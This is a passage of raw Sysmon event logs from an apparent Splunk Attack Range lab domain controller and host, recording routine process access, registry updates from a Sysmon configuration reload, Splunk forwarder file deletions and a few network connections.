:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.093{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001054606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.078{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.078{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.047{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.047{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.994{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:40.994{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:40.994{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36dd2|c:\windows\system32\rpcss.dll+4401|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810386Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:42.111{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65A3BBE611EAAB47E95C07F06E31F55F,SHA256=E28C0009A8250E0929406A5EE26BC29D8DF9A16BA0A93678C42CB5937524CD39,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001054652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:07:42.793{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\ConfigHashSHA256=E320A8D07D726007039F08B51C9F062E31DA98D37745B5619B1E7AF0A0D52D95 13241300x80000000000000001054651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 
08:07:42.793{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\ConfigFileC:\Program Files\ansible\AttackRangeSysmon.xml 16341600x80000000000000001054650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local2021-07-12 08:07:42.793C:\Program Files\ansible\AttackRangeSysmon.xmlSHA256=E320A8D07D726007039F08B51C9F062E31DA98D37745B5619B1E7AF0A0D52D95 13241300x80000000000000001054649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:07:42.793{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\RulesBinary Data 13241300x80000000000000001054648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:07:42.793{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\DnsLookupBinary Data 13241300x80000000000000001054647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:07:42.793{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\CheckRevocationBinary Data 13241300x80000000000000001054646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:07:42.793{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\HashingAlgorithmDWORD (0x8000000e) 13241300x80000000000000001054645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:07:42.793{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\OptionsDWORD (0x00000007) 
12241200x80000000000000001054644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 08:07:42.793{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\Rules 2553225500x80000000000000001054643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local2021-07-12 08:07:42.793ConfigMonitorThreadFailed to send message to the driver to update configuration - Last error: The system cannot find the file specified. 12241200x80000000000000001054642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 08:07:42.778{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\DnsLookup 12241200x80000000000000001054641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 08:07:42.778{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\CheckRevocation 12241200x80000000000000001054640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 08:07:42.778{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\HashingAlgorithm 12241200x80000000000000001054639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 08:07:42.778{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\Options 10341000x80000000000000001054638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.647{466BC892-F49A-60EB-327D-00000000CF01}61886504C:\Windows\system32\conhost.exe{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program 
Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.647{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:42.647{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.647{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:42.647{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.647{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.647{466BC892-F49A-60EB-317D-00000000CF01}95726844C:\Windows\system32\cmd.exe{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
154100x80000000000000001054631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.631{466BC892-F84E-60EB-F07D-00000000CF01}8652C:\Program Files\ansible\sysmon\Sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-Sysmon64.exe -c "C:\Program Files\ansible\AttackRangeSysmon.xml"C:\Program Files\ansible\sysmon\ATTACKRANGE\Administrator{466BC892-F49A-60EB-D4CC-F90400000000}0x4f9ccd43HighMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 23542300x80000000000000001054630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.047{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF663C9B0FBD5F33E01D3E05375D139C,SHA256=6E98DF1B3DC9CB413D774DC42FE0FD84843EC6C0E80448FF173D4C3DAFD89F9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.027{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2950C9E43CBA817532E613D12344C859,SHA256=A03E13BC503DD9AB57EFBA813EAB1BC157679C81193FF2E5A5916184527238FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:42.026{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C8EB7269E1D02F01C5FF7821748D9594,SHA256=AFF88296CC4F4EE3359B30396440F787DE28FF8F95676929BF86F904141A7732,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810388Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:42.699{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-44174-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000810387Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:43.157{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A01D1EB8401CB7E425FB89DF40FA0C60,SHA256=BA919E884D12C8272B6FE53704080F52A38525C3ECB1F5A200542F9C7C73BEFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:43.662{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0DC481D8325B0E46D34A43FBF8CA67FF,SHA256=9231EF0CDFA5EA90F762788BE78F583087FF6B7E61DC1EA28F62CEDA39061FE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:43.047{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7CCDF5E5D26F59D64F5DA28E2204D23,SHA256=297A1844EC115C617F7317E39592F72F23E03418C86AA2D93F0E5FD906A815B1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810392Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:43.302{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57462-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000810391Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:44.157{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=04E36365C2237E66041194ED9ADC5E5F,SHA256=159586B5154D8EF676E869671C02AA528985EB182A1F447FD485402C8AC03DA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810390Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:44.157{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=832ACFCDE0F3976DDA3986F5515014CC,SHA256=9B7E0B54170A94CB6E978DEE0CE910F6AF37071726CE0C218270A49CC412FE3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810389Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:44.157{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFE29CDD39D7ECE93895BA4A636531F1,SHA256=284DCF4C4192780BD313D67DC53AE14AE8BFFEF6B954426879DD8502C809F483,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:36.677{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57462-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001054655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:44.062{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=747A33615C05A11472C509D3BBA25EE2,SHA256=DF2AD79893D6DDA14424E14F8A4CA63F368806FD21ACE68177231381E53F8EDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:45.092{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BDF3565D92EF0675C755835846407F3,SHA256=68ECF5012E4D1F2893882B98AE326DEC1A5EE5A9C97E60F72DC7BDDDE335288A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810393Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:45.189{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68915C6B99544330384108E358A06399,SHA256=897A3A5FE0E5BD08BEE4AA631BC3F4378F88DFC3CE6F8DA4B518591DC5B0114B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:38.750{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61968-false10.0.1.12-8000- 10341000x80000000000000001054681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:46.862{466BC892-F49A-60EB-327D-00000000CF01}61886504C:\Windows\system32\conhost.exe{466BC892-F852-60EB-F17D-00000000CF01}8404C:\Program 